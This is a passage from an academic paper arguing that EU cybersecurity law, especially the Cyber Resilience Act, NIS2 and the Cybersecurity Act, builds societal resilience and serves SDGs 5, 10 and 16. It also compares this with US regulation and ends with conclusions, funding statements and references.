4.2. The EU Regulatory Approach: Cybersecurity as Infrastructure for Embedding Societal Resilience

Since the 2020s, the concept of societal resilience has been gaining prominence in the European Union’s security and regulatory discourse. The link between cybersecurity and democratic governance is more than just a new policy perspective; it signals a deeper paradigm shift. The security of the digital environment can no longer be addressed exclusively as a technological or national security challenge. Instead, access to safe digital spaces, digital competencies and participatory capacities of citizens, and the governance of platform-based threats collectively strengthens the broader resilience of society, not only in technical terms, but politically and culturally as well. This approach also reflects a social–technological model of governance in which technical regulation and societal inclusion are treated as mutually reinforcing components of public resilience. At the same time, these measures serve multiple Sustainable Development Goals, particularly SDG 5 (Gender Equality), SDG 10 (Reduced Inequalities), and SDG 16 (Peace, Justice, and Strong Institutions).
The EU’s 2020 Cybersecurity Strategy (European Commission 2020) explicitly identifies digital security as a cornerstone of societal resilience. What makes this document novel is its reframing of cybersecurity, not simply as a technological or security policy issue, but as one intimately linked with fundamental rights, the functioning of democratic institutions, and the social preconditions of both green and digital transitions. One of its recurring conceptual anchors is “resilience,” which it interprets not merely as systemic resistance but, albeit indirectly, as a function of civic engagement, public awareness, and educational access.
Significantly, the strategy promotes the principle of “security by design” not only for critical infrastructure and services but also for the planning of digital tools, workplaces, and platforms, framing this as a technological precondition of social resilience. Secure software is not just a technical matter but a question of who we trust to shape the systems we live with. By placing responsibility for security and vulnerability management on developers and manufacturers, the strategy draws a direct line between code and constitutional values. It suggests that public trust does not begin in the courtroom or the ballot box, but in the reliability of the digital tools people use every day. In that sense, safe digital environments and everyday cyber hygiene are not peripheral, they are what make participation possible, what hold cohesion together.
The strategy leaves no doubt: cybersecurity is not an isolated goal; it is a foundational condition for sustainable development and for preserving what the EU holds as its core values: freedom, democracy, and the rule of law. However, the path to this realization is not paved with firewalls and compliance checklists alone. The fight against disinformation, the response to hybrid threats, the investment in digital literacy, and the specific protection of women and children are not simply discrete policy fields; they are the contour lines of a broader political ambition. What emerges is the image of a society that is not only digitally equipped but socially grounded in civic responsiveness, an image of European digital citizenship. It is in this context that the alignment with the Sustainable Development Goals becomes more than symbolic: SDG 5 and SDG 16 are not footnotes to this project; they are intrinsic to its architecture. A secure and inclusive digital space is not merely desirable but a prerequisite to both gender equality and democratic coexistence.
The 2025 Internal Security Strategy (ProtectEU) (European Commission 2025) carries this logic forward, sharpening it, expanding it, and embedding it more deeply into the EU’s institutional reflexes. The document’s starting point is unambiguous: cybersecurity is not just a technical terrain, but one of the structural foundations of social resilience. The proposed responses are layered, legal, technological, and civic, mirroring the hybrid nature of the threats themselves. Software security, in particular, emerges in this strategy not simply as a technical parameter, but as a structural fault line that traverses the digital infrastructure at large. What’s really at stake here is not just whether the code is strong enough, but whether or not the systems we rely on every day can be trusted to hold. In that sense, the move toward mandatory development protocols and certification is not just a matter of tightening the rules, it is a way of asking: who bears responsibility when things fail? And how do we build systems that do not just function, but deserve our trust?
This is where the EU’s dual approach, combining the Cyber Resilience Act with the NIS2 Directive (European Parliament and Council 2022), becomes critical. While the CRA focuses on the security of digital products themselves (‘security of the technology’), the NIS2 Directive mandates a high level of cybersecurity risk management for the crucial entities that deliver our society’s essential services, from healthcare to energy (‘security through the technology’). By expanding its scope and imposing stricter security and reporting obligations on a wider range of sectors, NIS2 aims to bolster the resilience of the EU’s critical infrastructure as a whole (Vandezande 2024; Lucini 2023). Together, these regulations form a comprehensive architecture designed to secure both the digital tools and the societal functions that depend on them, thereby contributing to overall societal resilience (Longo et al. 2025).
They do not just demand safety; they require it to be premeditated, engineered, lived. The strategy also frames the Digital Services Act as a key instrument in this shift, portraying it as a tool that draws platform governance out of the realm of private discretion and into the domain of public accountability. Digital security, in this view, is no longer a question of best intentions; it is a condition of democratic life and civic acceptance and must be treated as such.
The significance of the 2025 Internal Security Strategy lies not only in what it regulates, but in how it reimagines resilience. Societal cohesion is treated not as an abstract ideal, but as a fragile construct threatened by online radicalization, hate speech, and the erosion of shared truths. The measures proposed extend beyond only technical corrections or crisis-mitigation protocols. The updated strategy sets in motion a shift in posture, marking a dramatic turn from passive containment to active structural anticipation. Digital crisis frameworks, reinforced protections for children, and new accountability mandates for platforms are not ad hoc solutions; they are early markers of a proactive governance model. In this reframing, security becomes less a reaction to breaches and more a proactive precondition for ensured civic continuity.
Equally crucial is the focus on skills and awareness, particularly among those least shielded from threats and harm: children, women, and minorities. This is not incidental. It is the practical expression of the resilience-by-design principle: the idea that a society does not become resilient through firewalls alone, but through inclusive, participatory, and self-aware democratic formation. In this way, the strategy aligns not only with SDG 5 and SDG 16 but also with SDG 10, reducing inequalities not as a by-product but as a directed governing imperative. What takes shape here is a social–technological model in its truest sense. The new model presents cybersecurity frameworks, legal safeguards, and cultural norms not as separate logics but interdependent layers of the same democratic structure. It is precisely this layered interdependence that allows digital resilience to become what it was meant to be, societal.
It is worth briefly examining how the cybersecurity-related legislative acts referenced in these strategies, particularly those concerning software security, contribute to the objectives outlined above.
The Cybersecurity Act (European Parliament and Council 2019) does not just introduce a certification regime; it reframes cybersecurity as a structural element of democratic governance. By anchoring ENISA as a permanent agency with strategic and operational mandates, the regulation elevates digital security from a technical policy field to a matter of institutional continuity. What emerges is a governance model in which cybersecurity is not isolated from the broader political fabric but embedded within the architecture of public trust and social resilience.
The creation of a unified EU certification framework marks a subtle but significant shift. This move is widely analyzed in the literature as a key instrument for harmonizing the fragmented digital single market and fostering trust by creating a transparent, EU-wide standard for security assurance, particularly for a wide range of ICT products and services (Hernández-Ramos et al. 2021; Khurshid et al. 2022). While formally voluntary, the layered logic of the Act suggests a long-term trajectory: one in which certified security becomes the normative standard, not an exception. The text places repeated emphasis on “security by design” and “security by default,” not as abstract engineering ideals, but as systemic expectations, signalling to developers and manufacturers that software vulnerabilities are not merely technical oversights, but potential threats to civic stability.
This link between a technical flaw and societal-level disruption is now a well-documented phenomenon. As scholarly analyses of major cyber incidents show, modern societies’ reliance on interconnected critical infrastructures creates a fertile ground for cascading failures. A single software vulnerability, whether in an energy grid or a hospital’s IT system, can be exploited to trigger widespread service interruptions, causing significant economic damage and eroding the public’s trust in essential institutions (Riggs et al. 2023). These risks are particularly acute in the context of the software supply chain, where a vulnerability in a single third-party component can be inherited by countless systems, enabling large-scale, stealthy attacks that undermine the entire digital ecosystem (Tan et al. 2025). The concept of ‘civic stability’, therefore, is no longer separable from the operational integrity of the digital systems that underpin it.
Applying the socio-legal perspective outlined in our methodology, the Act speaks the language of resilience, even if not explicitly stated. It ties the reliability of digital services to the social preconditions of democratic participation. It links trust in infrastructure to the rule of law and aligns, however implicitly, with the aims of SDG 16: building peaceful, inclusive institutions in a digital age. In addressing the security of essential services, the Act also resonates with SDGs 5 and 10 by setting conditions under which women, children, and marginalized users can access technology without disproportionate risk. Cybersecurity, in this frame, is no longer the shield behind the system; it becomes part of the system’s protective exoskeleton.
The Cyber Resilience Act (CRA) (European Parliament and Council 2024), in particular, represents a cornerstone of this new regulatory philosophy and has spurred significant scholarly debate. Existing academic analyses highlight the Act’s profound impact on market dynamics and legal obligations. Much of this research understandably focuses on the practical challenges of implementation, such as the new compliance burdens and potential liabilities for developers, especially within the open-source software ecosystem (Colonna 2025). Other scholars emphasize the complexities of its legal enforcement and the crucial role of harmonized European standards in making the framework operational (Kamara 2024; Shaffique 2024).
While these economic and legal perspectives are vital, a central theme also emerging in the literature is the CRA’s role in engineering a fundamental shift in responsibility, moving accountability for security from consumers to producers (Shaffique 2024). Some analyses have even begun to explore whether the regulation’s architecture serves a deeper purpose of protecting fundamental rights, albeit implicitly (Chiara 2025).
Our analysis builds on and extends these insights. While acknowledging the importance of the legal and economic dimensions, we contribute a novel perspective by focusing specifically on how this reconfiguration of responsibility functions as a socio-technical mechanism aimed at building societal resilience. We argue that by embedding security obligations directly into the product lifecycle and holding manufacturers accountable, the CRA not only addresses technical vulnerabilities but also tackles systemic societal issues like the protection of vulnerable users and the promotion of digital equity. It is this explicit connection between technical mandate and social outcome that we explore in the following sections.
The Cyber Resilience Act does more than lay out technical specifications, it sketches a political vision of digital trust. Setting horizontal cybersecurity requirements for all products with digital elements, it weaves security not just into the design of devices, but into the architecture of collective resilience. The principles of “secure by design” and “secure by default” function here not as engineering preferences, but as structural conditions for maintaining societal confidence in an increasingly complex digital public sphere.
The Act’s approach to achieving this is fundamentally structural, a point increasingly recognized in scholarly analyses. Recognizing that many users lack sufficient technical understanding (Recital 1), the regulation shifts the burden of security away from the individual and places it firmly on the manufacturer (Shaffique 2024). This responsibility is embedded across the entire lifecycle of a device, reframing digital safety from a static feature at launch to an evolving, long-term commitment. Regular updates, transparent vulnerability reporting, and accountable patch management are no longer mere best practices but legally mandated conditions for maintaining the social contract on which digital trust depends. This ‘secure-by-design’ logic effectively addresses user vulnerability without demanding that they become cybersecurity experts, a move some scholars see as a form of “protection of fundamental rights in disguise” (Chiara 2025). Reporting duties, too, are reframed as instruments of collective defence. The requirement to notify both national authorities and ENISA of major incidents and exploited vulnerabilities reflects a governance logic that is no longer reactive, but anticipatory. Transparency and coordinated response are no longer virtues; they are baseline expectations of digital maturity.
While the Cyber Resilience Act’s primary function is to set enforceable technical standards, its underlying logic, as detailed in its preamble, extends significantly beyond mere technical compliance. The regulation is built upon the explicit acknowledgement of a fundamental power and knowledge asymmetry, noting the “insufficient understanding and access to information by users” (Recital 1). It directly addresses the societal impact on “vulnerable consumers, such as toys and baby monitoring systems” (Recital 10), demonstrating a clear legislative intent to protect those least able to protect themselves.
To counteract these disparities, the CRA mandates structural safeguards. It requires that user information be “clear, understandable, intelligible and legible” and provided in a “language which can be easily understood by users” (Article 13(18)), directly targeting barriers related to digital literacy and language. Furthermore, the regulation’s vision of resilience is tied to broader societal capacity, promoting measures to create a cybersecurity workforce that is “inclusive, also in terms of gender” (Recital 23).
Therefore, while terms like ‘civic inclusion’ or ‘digital equity’ may not appear in the operative articles, the CRA’s foundational principles are demonstrably designed to mitigate structural inequalities by shifting the burden of security from the individual user to the manufacturer. By creating a safer digital environment for all, irrespective of technical skill or vulnerability, the Act’s framework resonates with the core ambitions of SDG 10 (Reduced Inequalities) and SDG 16 (Peace, Justice, and Strong Institutions). Similarly, while not a primary objective, the stated aim of fostering an inclusive workforce (Recital 23) shows a legislative awareness that is consistent with the principles of SDG 5 (Gender Equality).
At the same time, the regulation’s concept of resilience is also extended to the user side. Information and details related to obligations imposed on manufacturers, such as disclosing product security features, support duration, and updated availability, are intended to strengthen the awareness behind user choices. In this framework, societal resilience does not mean shielding end-users as passive recipients of protection but enabling their active and informed participation. This reinforcement of individual decision-making capacity contributes directly to the overall security and safety of the community.
The CRA thus exemplifies a social–technological model of resilience, in which legal obligation, technical design, and civic inclusion are no longer separable domains but interdependent elements of a common digital future.
Beyond the principles embedded in its recitals, perhaps the CRA’s most tangible contribution to sustainability and social resilience is found in its lifecycle support obligations. By mandating that manufacturers provide security updates for a product’s expected lifetime—a period often anticipated to be around five years for many consumer devices—the regulation directly counters the logic of planned obsolescence. This requirement not only enhances security over time but also promotes environmental sustainability by extending the useful life of digital products, thereby reducing electronic waste, aligning with SDG 12 (Responsible Consumption and Production). Crucially, this mechanism also serves a clear socio-technical purpose, as outlined in the regulation’s preamble. By linking a manufacturer’s liability to the failure to provide security updates (Recital 31), the CRA addresses the dual problems of inconsistent security practices and the information asymmetry faced by users (Recital 1). This shifting of responsibility from the end-user to the producer is a direct intervention designed to protect less digitally literate consumers, thus reinforcing the regulation’s role in fostering digital equity.
Based on the strategies and legislative acts examined, it becomes clear that the European Union seeks more than to just defend against threats in the digital sphere; it aims to actively shape how that sphere is embedded within society. Cybersecurity, particularly the regulation of software security, is treated not only as an end in itself but, at times, as a means to achieve those ends: a regulatory lever through which technological reliability becomes a structural precondition for social cohesion, civic participation, and institutional trust. This approach is not technocratic, but normative and inclusive: the security of the digital environment is conceptualized as a configurable component of societal resilience. The alignment with SDGs 5, 10, and 16 is not simply rhetorical; it is substantive and operational. The EU’s vision of resilience is built on reducing digital inequalities, reinforcing inclusive institutions, and universalizing access to digital security. What emerges, therefore, is not just a defensive framework, but a proactive social–technological model that doubles as a tool for shaping the future democratic fabric of digital society.

4.3. Converging Principles and the Socio-Technical Imperative in Cybersecurity Regulation

Although the EU and the U.S. rely on different legal architectures and specific regulatory instruments (such as the Cyber Resilience Act, Cybersecurity Act, Executive Order 14028 (2021), and SBOM-related requirements), this study reveals a converging core insight across both jurisdictions: digital safety extends beyond mere operational continuity to encompass the preservation of civic trust. Both regulatory landscapes demonstrate a move towards incorporating the principles of “resilience by design” and “security by design” in a structured manner. While security by design aims to prevent attacks, resilience by design ensures that systems can endure them. The former builds the walls; the latter makes sure the structure holds even if a wall is breached. The regulations we examine are pushing for both: systems that are robustly defended, yet fundamentally resilient.
This convergence is key to aligning cybersecurity regulation with broader goals of what can be termed sustainable civic development. This is not merely a theoretical linkage; a growing body of scholarly work now explicitly frames cybersecurity as a fundamental pillar for sustainable development.
As systematic reviews of the literature demonstrate, the connection extends across multiple dimensions. Economically, robust cybersecurity protects the critical infrastructure necessary for stable growth (Morales-Sáenz et al. 2024). Socially, it safeguards personal data and fosters the public trust essential for equitable digital access. This contribution to building strong, reliable institutions and protecting public access to information is increasingly seen as a direct enabler of SDG 16 (Kuday 2024). By strengthening institutional trust and protecting vulnerable populations, cybersecurity governance therefore becomes an indispensable tool for building a more durable and equitable civic foundation in the digital age.
This normative repositioning of software security, as identified in both the U.S. and EU contexts, transcends the mere re-regulation of the digital sector. It points towards the necessity of designing governance models that deliberately integrate technological and societal dimensions. This represents a significant shift: it is not that traditional security controls have always implicitly served resilience, but rather that new regulatory pressures are forcing a deliberate reframing of security itself. The move towards mandatory ‘security by design’ and transparent vulnerability management marks a structural change where security is no longer just about building walls, but about designing systems that can function gracefully under pressure—the operationalization of resilience through policy. The analysis underscores that an integrated, socio-technical model—one that accounts for the interplay between technology, institutions, and social practices—is uniquely capable of operationalizing the conditions for societal resilience through software security, not as an after-the-fact intervention, but as a built-in mode of operation. The failure to respond adequately to software threats, as illustrated by the Log4Shell or Equifax incidents, is not just a technical or data protection lapse; it signals a breakdown in this socio-technical fabric and erodes public trust. Meaningful regulation, therefore, must structure not only obligations for developers but also empower the rights, awareness, and agency of end users.

4.4. Comparative Overview

The following table (Table 1) compares the cybersecurity legislative frameworks in the EU and the US, focusing on the distribution of responsibilities, obligations towards users and the approach to the SDG.
The European Union takes a holistic approach, assigning clear cybersecurity duties to all stakeholders in the digital product lifecycle. National regulators play an active enforcement role. Transparency, long-term support, and user communication are legally required, and sustainability goals are woven into the legal framework.
The United States emphasizes the security of federal systems, with agencies and their suppliers required to meet defined cybersecurity standards. While transparency and rapid response are important, the legislation is less explicit about sustainability or consumer protection, focusing instead on safeguarding government interests and supply chain integrity.

5. Conclusions

5.1. Main Findings and Implications

What this study ultimately shows is that the way software security is regulated has a profound influence on a society’s ability to withstand stress and disruption. One of the most important insights we arrived at is that maintaining reliable and trustworthy digital systems is not simply a technical obligation. It is a clear signal of institutional responsibility, and it connects directly to the goals set out in SDG 16, which calls for peace, justice, and strong institutions.
Our findings also bring attention to the relevance of SDG 5 on gender equality and SDG 10 on reducing inequalities, especially when we consider who tends to bear the greatest share of digital risks. Ensuring security in digital environments cannot be reduced to technical excellence alone. It also means making sure that people can engage with digital systems in fair and secure ways. This is especially important for those who are often placed at a disadvantage, such as women, children, the elderly, and marginalized communities. In this sense, resilience is not only about the durability of systems, but about the capacity of a society to respond to threats together, through mechanisms that are inclusive and participatory.
What we argue, then, is that cybersecurity regulation designed with resilience in mind and shaped by a socio-technical understanding can go far beyond risk mitigation. It can actively contribute to building a society that is more just, more equal, and more capable of facing future challenges in a collective way.

5.2. Limitations and Avenues for Future Research

This study does not aim to measure resilience quantitatively or assess regulatory effectiveness in statistical terms. Rather, it offers an interpretive exploration of how legal and policy frameworks embed normative expectations around societal resilience.
Looking ahead, there’s still a lot we don’t know. This study focused on the EU and the US, but it is important to see how similar ideas might work in other parts of the world. Do these kinds of rules actually hold up in different settings? Do they make a difference for people in their daily lives? It would be helpful to follow how these approaches play out over time, in different sectors and communities, to understand what really works and what might need to change.

Author Contributions

Conceptualization, R.K. and Á.M.; methodology, R.K., B.B. and M.M.; validation, R.K., J.S., Á.M., J.C., B.B. and M.M.; formal analysis, R.K., J.S., Á.M., J.C., B.B. and M.M.; investigation, R.K., J.S., Á.M., J.C., B.B. and M.M.; data curation, R.K., J.S., Á.M., J.C., B.B. and M.M.; writing—original draft preparation, R.K., J.S., Á.M., J.C., B.B. and M.M.; writing—review and editing, R.K., J.S., Á.M., J.C., B.B. and M.M.; visualization, R.K., B.B. and M.M.; supervision, R.K., J.S. and B.B.; project administration, R.K. All authors have read and agreed to the published version of the manuscript.

Funding

Author R.K. was supported by the EKÖP-24-4-II-SZE-72 University Research Fellowship Program of the Ministry for Culture and Innovation from the source of the National Research, Development and Innovation fund. The APC was funded by Széchenyi István University.

Institutional Review Board Statement

Not applicable.

Informed Consent Statement

Not applicable.

Conflicts of Interest

The authors declare no conflicts of interest. The funders had no role in the design of the study; in the collection, analyses or interpretation of data; in the writing of the manuscript; or in the decision to publish the results.

References

  1. Aldaajeh, Saad, Husam Saleous, Sulaiman Alrabaee, Elhadj Barka, Frank Breitinger, and Kim-Kwang Raymond Choo. 2022. The role of national cybersecurity strategies on the improvement of cybersecurity education. Computers & Security 119: 102754. [Google Scholar] [CrossRef]
  2. Alghawli, Ali, and Tetyana Radivilova. 2024. Resilient Cloud cluster with DevSecOps security model, automates a data analysis, vulnerability search and risk calculation. Alexandria Engineering Journal 107: 136–49. [Google Scholar] [CrossRef]
  3. Andrade, Ricardo, Javier Torres, Isabel Ortiz-Garcés, Jorge Miño, and Luis Almeida. 2023. An exploratory study gathering security requirements for the software development process. Electronics 12: 3594. [Google Scholar] [CrossRef]
  4. Aziz, Khaldoun, Ameen Daoud, Anjali Singh, and Mohammed A. Alhusban. 2025. Integrating digital mapping technologies in urban development: Advancing sustainable and resilient infrastructure for SDG 9 achievement—A systematic review. Alexandria Engineering Journal 116: 185–207. [Google Scholar] [CrossRef]
  5. Bellovin, Steven M. 2023. Is Cybersecurity Liability a Liability? IEEE Security & Privacy 21: 99–100. [Google Scholar] [CrossRef]
  6. Boss, Steven R., Julie R. Gray, and Diane J. Janvrin. 2024. Be an Expert: A Critical Thinking Approach to Responding to High-Profile Cybersecurity Breaches. Issues in Accounting Education 39: 93–113. [Google Scholar] [CrossRef]
  7. Brewster, Thomas. 2016. Crooks Behind $81M Bangladesh Bank Heist Linked to Sony Pictures Hackers. Available online: https://www.forbes.com/sites/thomasbrewster/2016/05/13/81m-bangladesh-bank-hackers-sony-pictures-breach/ (accessed on 20 June 2024).
  8. Cañizares, Javier, Sam Copeland, and Neelke Doorn. 2021. Making Sense of Resilience. Sustainability 13: 8538. [Google Scholar] [CrossRef]
  9. Carmody, Seth, Andrea Coravos, Ginny Fahs, Audra Hatch, Janine Medina, Beau Woods, and Joshua Corman. 2021. Building resilient medical technology supply chains with a software bill of materials. Npj Digital Medicine 4: 34. [Google Scholar] [CrossRef]
  10. Cavelty, Myriam Dunn, Carina Eriksen, and Björn Scharte. 2023. Making cyber security more resilient: Adding social considerations to technological fixes. Journal of Risk Research 26: 513–27. [Google Scholar] [CrossRef]
  11. Chai, Wesley. 2022. Confidentiality, Integrity and Availability (CIA Triad). Available online: https://www.techtarget.com/whatis/definition/Confidentiality-integrity-and-availability-CIA (accessed on 20 June 2024).
  12. Chiara, Pier Giorgio. 2025. Understanding the Regulatory Approach of the Cyber Resilience Act: Protection of Fundamental Rights in Disguise? European Journal of Risk Regulation 16: 469–84. [Google Scholar] [CrossRef]
  13. Colabianchi, Silvia, Francesco Costantino, Giulio Di Gravio, Flavio Nonino, and Riccardo Patriarca. 2021. Discussing resilience in the context of cyber physical systems. Computers & Industrial Engineering 160: 107534. [Google Scholar] [CrossRef]
  14. Colonna, Liane. 2025. The end of open source? Regulating open source under the cyber resilience act and the new product liability directive. Computer Law & Security Review 56: 106105. [Google Scholar] [CrossRef]
  15. Dede, Georgios, Angeliki Petsa, Sotirios Kavalaris, Evangelos Serrelis, Sotirios Evangelatos, Ioannis Oikonomidis, and Theodoros Kamalakis. 2024. Cybersecurity as a contributor toward resilient Internet of Things (IoT) infrastructure and sustainable economic growth. Information 15: 798. [Google Scholar] [CrossRef]
  16. Easterly, Jen, and Tim Fanning. 2023. The Attack on Colonial Pipeline: What We’ve Learned & What We’ve Done Over the Past Two Years. Available online: https://www.cisa.gov/news-events/news/attack-colonial-pipeline-what-weve-learned-what-weve-done-over-past-two-years (accessed on 20 June 2024).
  17. Escobar, Arturo. 1994. Welcome to Cyberia: Notes on the anthropology of cyberculture. Current Anthropology 35: 211–31. [Google Scholar] [CrossRef]
  18. European Commission. 2025. Communication from the Commission to the European Parliament, the Council, the European Economic and Social Committee and the Committee of the Regions on ProtectEU: A European Internal Security Strategy. COM(2025) 148 Final. Available online: https://eur-lex.europa.eu/legal-content/EN/TXT/PDF/?uri=CELEX:52025DC0148 (accessed on 20 June 2024).
  19. European Commission, and High Representative of the Union for Foreign Affairs and Security Policy. 2013. Joint communication to the European Parliament, the Council, the European Economic and Social Committee and the Committee of the Regions: Cybersecurity Strategy of the European Union: An Open, Safe and Secure Cyberspace. JOIN(2013) 1 Final. Available online: https://eur-lex.europa.eu/legal-content/EN/TXT/PDF/?uri=CELEX:52013JC0001 (accessed on 20 June 2024).
  20. European Commission, and High Representative of the Union for Foreign Affairs and Security Policy. 2020. Joint Communication to the European Parliament and the Council: The EU’s Cybersecurity Strategy for the Digital Decade. JOIN(2020) 18 Final. Available online: https://eur-lex.europa.eu/legal-content/EN/TXT/PDF/?uri=CELEX:52020JC0018 (accessed on 20 June 2024).
  21. European Parliament and Council. 2019. Regulation (EU) 2019/881 of the European Parliament and of the Council of 17 April 2019 on ENISA (the European Union Agency for Cybersecurity) and on Information and Communications Technology Cybersecurity Certification and Repealing Regulation (EU) No 526/2013 (Cybersecurity Act). Official Journal of the European Union L151: 15–69. Available online: https://eur-lex.europa.eu/eli/reg/2019/881/oj/eng (accessed on 20 June 2024).
  22. European Parliament and Council. 2022. Directive (EU) 2022/2555 of the European Parliament and of the Council of 14 December 2022 on Measures for a High Common Level of Cybersecurity Across the Union (NIS2 Directive). Official Journal of the European Union L333: 80–152. Available online: https://eur-lex.europa.eu/eli/dir/2022/2555/oj/eng (accessed on 20 June 2024).
  23. European Parliament and Council. 2024. Regulation (EU) 2024/2847 of the European Parliament and of the Council of 23 October 2024 on Horizontal Cybersecurity Requirements for Products with Digital Elements and Amending Regulations (EU) No 168/2013 and (EU) 2019/1020 and Directive (EU) 2020/1828 (Cyber Resilience Act). Official Journal of the European Union L2024/2847: 1–177. Available online: https://eur-lex.europa.eu/eli/reg/2024/2847/oj/eng (accessed on 20 June 2024).
  24. Executive Order 14028. 2021. Improving the Nation’s Cybersecurity. Federal Register 86: 26633–45. Available online: https://www.govinfo.gov/content/pkg/FR-2021-05-17/pdf/2021-10460.pdf (accessed on 20 June 2024).
  25. Farkas, Ádám, and László Vikman. 2024. Information operations as a question of law and cyber sovereignty. ELTE Law Journal 12: 187–206. [Google Scholar] [CrossRef]
  26. Federal Information Security Modernization Act (FISMA). 2014. Public Law No: 113–283. Available online: https://www.congress.gov/bill/113th-congress/house-bill/1163 (accessed on 20 June 2025).
  27. Gasiba, Theodora, Ulrich Lechner, and Miguel Pinto-Albuquerque. 2020. Sifu—A cybersecurity awareness platform with challenge assessment and intelligent coach. Cybersecurity 3: 24. [Google Scholar] [CrossRef]
  28. Guo, Wei, Yunlin Fang, Chuanhuang Huang, Haoyu Ou, Changsheng Lin, and Yanfeng Guo. 2022. HyVulDect: A hybrid semantic vulnerability mining system based on graph neural network. Computers & Security 121: 102823. [Google Scholar] [CrossRef]
  29. Hadi, Hanif, Noraidah Ahmad, Khaldoun Aziz, Yuan Cao, and Mohannad A. Alshara. 2024. Cost-effective resilience: A comprehensive survey and tutorial on assessing open-source cybersecurity tools for multi-tiered defense. IEEE Access 12: 194053–76. [Google Scholar] [CrossRef]
  30. Hernández-Ramos, Jose L., Sara N. Matheu, and Antonio Skarmeta. 2021. The Challenges of Software Cybersecurity Certification [Building Security In]. IEEE Security & Privacy 19: 99–102. [Google Scholar] [CrossRef]
  31. ISO (International Organization for Standardization). 2022. Information Security, Cybersecurity and Privacy Protection—Information Security Management Systems—Requirements. ISO/IEC 27001. Geneva: International Organization for Standardization.
  32. Janca, Tanya. 2021. Alice & Bob Learn Application Security. Indianapolis: John Wiley & Sons, Inc. [Google Scholar]
  33. Kamara, Irene. 2024. European cybersecurity standardisation: A tale of two solitudes in view of Europe’s cyber resilience. Innovation: The European Journal of Social Science Research 37: 1441–60. [Google Scholar] [CrossRef]
  34. Kang, Sanggil, and Sehyun Kim. 2022. CIA-level driven secure SDLC framework for integrating security into SDLC process. Journal of Ambient Intelligence and Humanized Computing 13: 4601–24. [Google Scholar] [CrossRef]
  35. Kelemen, Roland. 2023. The impact of the Russian-Ukrainian hybrid war on the European Union’s cybersecurity policies and regulations. Connections: The Quarterly Journal 22: 85–104. [Google Scholar] [CrossRef]
  36. Kelemen, Roland, Joseph Squillace, Richárd Németh, and Justice Cappella. 2024. The impact of digital inequality on IT identity in the light of inequalities in internet access. ELTE Law Journal 12: 173–86. [Google Scholar] [CrossRef]
  37. Khan, Rizwan Ullah, Siffat Ullah Khan, Muhammad Azeem Akbar, and Mohammed H. Alzahrani. 2022. Security risks of global software development life cycle: Industry practitioner’s perspective. Journal of Software: Evolution and Process 34: e2521. [Google Scholar] [CrossRef]
  38. Khurshid, Anum, Reem Alsaaidi, Mudassar Aslam, and Shahid Raza. 2022. EU Cybersecurity Act and IoT Certification: Landscape, Perspective and a Proposed Template Scheme. IEEE Access 10: 129932–48. [Google Scholar] [CrossRef]
  39. Kuday, Ahmet Dogan. 2024. Sustainable Development in the Digital World: The Importance of Cybersecurity. Disaster Medicine and Public Health Preparedness 18: e279. [Google Scholar] [CrossRef]
  40. Kuzior, Aleksandra, Iryna Tiutiunyk, Anna Zielińska, and Roland Kelemen. 2024. Cybersecurity and cybercrime: Current trends and threats. Journal of International Studies 17: 181–92. [Google Scholar] [CrossRef]
  41. Latour, Bruno. 1987. Science in Action: How to Follow Scientists and Engineers Through Society. Cambridge: Harvard University Press. [Google Scholar]
  42. Longo, Antonella, Ali Aghazadeh Ardebili, Alessandro Lazari, and Antonio Ficarella. 2025. Cyber–Physical Resilience: Evolution of Concept, Indicators, and Legal Frameworks. Electronics 14: 1684. [Google Scholar] [CrossRef]
  43. Lucini, Valentino. 2023. The Ever-Increasing Cybersecurity Compliance in Europe: The NIS 2 and What All Businesses in the EU Should Be Aware of. Russian Law Journal 11: 911. [Google Scholar] [CrossRef]
  44. Maurer, Fabian, and Andreas Fritzsche. 2023. Layered structures of robustness and resilience: Evidence from cybersecurity projects for critical infrastructures in Central Europe. Strategic Change 32: 139–53. [Google Scholar] [CrossRef]
  45. Microsoft. 2022. Podpora Proaktívneho Zabezpečenia s Nulovou Dôverou (Zero Trust) [Supporting Proactive Security with Zero Trust]. Available online: https://www.microsoft.com/sk-sk/security/business/zero-trust (accessed on 20 June 2024).
  46. Morales-Sáenz, Francisco Isai, José Melchor Medina-Quintero, and Miguel Reyna-Castillo. 2024. Beyond Data Protection: Exploring the Convergence between Cybersecurity and Sustainable Development in Business. Sustainability 16: 5884. [Google Scholar] [CrossRef]
  47. Nash, Iain. 2021. Cybersecurity in a post-data environment: Considerations on the regulation of code and the role of producer and consumer liability in smart devices. Computer Law & Security Review 40: 105529. [Google Scholar] [CrossRef]
  48. National Cybersecurity Strategy. 2023. Washington, DC: The White House. Available online: https://bidenwhitehouse.archives.gov/wp-content/uploads/2023/03/National-Cybersecurity-Strategy-2023.pdf (accessed on 20 June 2024).
  49. North Atlantic Council. 2018. Brussels Summit Declaration. Available online: https://www.nato.int/cps/en/natohq/official_texts_156624.htm (accessed on 20 June 2024).
  50. Peschka, Vilmos. 1988. A jog sajátossága. Budapest: Akadémiai Kiadó. [Google Scholar]
  51. Pigola, André, and Fernando De Souza Meirelles. 2024. Unraveling trust management in cybersecurity: Insights from a systematic literature review. Information Technology and Management 25: 26. [Google Scholar] [CrossRef]
  52. Popkova, Elena G., Paolo De Bernardi, Yulia G. Tyurina, and Bruno S. Sergi. 2022. A theory of digital technology advancement to address the grand challenges of sustainable development. Technology in Society 68: 101831. [Google Scholar] [CrossRef]
  53. Riggs, Hugo, Shahid Tufail, Imtiaz Parvez, Mohd Tariq, Mohammed Aquib Khan, Asham Amir, Kedari Vuda, and Arif Sarwat. 2023. Impact, Vulnerabilities, and Mitigation Strategies for Cyber-Secure Critical Infrastructure. Sensors 23: 4060. [Google Scholar] [CrossRef]
  54. Saeed, Syed Ali, Sami Ali Altamimi, Nora M. Alkayyal, Eman H. Alshehri, and Dhoha A. Alabbad. 2023. Digital transformation and cybersecurity challenges for businesses resilience: Issues and recommendations. Sensors 23: 6666. [Google Scholar] [CrossRef]
  55. Shaffique, Mohammed Raiz. 2024. Cyber Resilience Act 2022: A silver bullet for cybersecurity of IoT devices or a shot in the dark? Computer Law & Security Review 54: 106009. [Google Scholar] [CrossRef]
  56. Shan, Chaoran, Yuwei Gong, Lingxuan Xiong, Sihan Liao, and Yong Wang. 2022. A software vulnerability detection method based on complex network community. Security and Communication Networks 2022: 3024731. [Google Scholar] [CrossRef]
  57. Sun, Xinchen, Jiazhou Jin, Yuanyuan Yang, and Yushun Pan. 2024. Telling the “bad” to motivate your users to update: Evidence from behavioral and ERP studies. Computers in Human Behavior 153: 108078. [Google Scholar] [CrossRef]
